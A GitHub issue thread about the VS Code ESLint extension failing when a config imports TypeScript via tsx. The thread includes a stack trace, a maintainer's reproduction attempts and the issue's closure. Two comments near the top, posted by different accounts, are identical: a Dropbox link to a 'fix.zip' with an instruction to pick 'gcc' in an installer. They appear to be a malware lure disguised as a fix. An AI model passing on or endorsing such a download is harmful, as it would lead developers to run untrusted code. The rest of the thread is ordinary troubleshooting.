### ISSUE TITLE
Extension fails when config imports via tsx or jiti

### ISSUE THREAD

**Issue by RebeccaStevens** [microsoft/vscode-eslint#1923]
Config files like the following result in the extension erroring. Running eslint via the cli work fine.

```js
import { tsImport } from "tsx/esm/api";

const local = await tsImport("./src/index.ts", import.meta.url).then(
  (r) => r.default,
);

const configs = [
  // ...
);

// Use our local version of the plugin.
for (const config of configs) {
  if (config?.plugins?.["my-plugin"] !== undefined) {
    config.plugins["my-plugin"] = local;
  }
}

export default configs;
```

Output:

```sh
[Info ] ESLint server is starting.
[Info ] ESLint server running in node v20.14.0
[Info ] ESLint server is running.
[Info ] ESLint library loaded from: /path/to/project/node_modules/.pnpm/eslint@9.8.0/node_modules/eslint/lib/api.js
[Error] An unexpected error occurred:
[Error] TransformError: Cannot read properties of undefined (reading 'size')
    at normalizeSpawnArguments (node:child_process:726:34)
    at Object.spawn (node:child_process:792:13)
    at ensureServiceIsRunning (/path/to/project/node_modules/.pnpm/esbuild@0.21.5/node_modules/esbuild/lib/main.js:1975:29)
    at transform (/path/to/project/node_modules/.pnpm/esbuild@0.21.5/node_modules/esbuild/lib/main.js:1875:37)
    at file:///path/to/project/node_modules/.pnpm/tsx@4.16.5/node_modules/tsx/dist/index-DeKCL_WS.mjs:16:2654
    at applyTransformers (file:///path/to/project/node_modules/.pnpm/tsx@4.16.5/node_modules/tsx/dist/index-DeKCL_WS.mjs:16:1266)
    at transform (file:///path/to/project/node_modules/.pnpm/tsx@4.16.5/node_modules/tsx/dist/index-DeKCL_WS.mjs:16:2601)
    at load (file:///path/to/project/node_modules/.pnpm/tsx@4.16.5/node_modules/tsx/dist/esm/index.mjs?1724634499253:2:2245)
    at async nextLoad (node:internal/modules/esm/hooks:866:22)
    at async Hooks.load (node:internal/modules/esm/hooks:449:20)
```

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by dbaeumer** [comment]
@RebeccaStevens can you please provide me with a GitHub repository I can clone that contains a minimal setup demoing the problem. This can be caused by many things and without a good reproducible case it is hard to say why it fails.

**Comment by RebeccaStevens** [comment]
@dbaeumer Here's a non-minimal repo: https://github.com/eslint-functional/eslint-plugin-functional

I can make a minimal version later when I get some time.

**Comment by dbaeumer** [comment]
@RebeccaStevens I cloned the repository you provided but I already fail with some initialization steps. So a minimal version is highly appreciated.

**Comment by dbaeumer** [comment]
After running `pnpm build` things started to load. However ESLint works for me as expected

<img width="621" alt="image" src="https://github.com/user-attachments/assets/d1337d22-44a4-4eae-bebe-8621f92bbf3e">


Appreciate a minimal version with steps on how to reproduce what you are seeing.

**Comment by adiktofsugar** [comment]
I also ran into this issue so I figured I'd just do what you asked, ha.

minimal repo: https://github.com/adiktofsugar/tsx-eslint-fail

setup steps are:
- `npm i`

If you run `npx eslint` you see failures.
If you go to vscode you get output very similar to what @RebeccaStevens pasted in.

**Comment by dbaeumer** [comment]
@adiktofsugar i was not able to reproduce this

![Image](https://github.com/user-attachments/assets/c44a6d6f-6725-451e-8a66-8c787c1039d1)


Anything special you can think of with your setup?

**Comment by adiktofsugar** [comment]
I can't reproduce it now either. In my minimal repo or the one I was originally having trouble with. That's...odd, but I'm happy about it. Thanks for taking a look! I guess this can be closed now?

**Comment by dbaeumer** [comment]
Thanks for reporting back. Will close the issue.
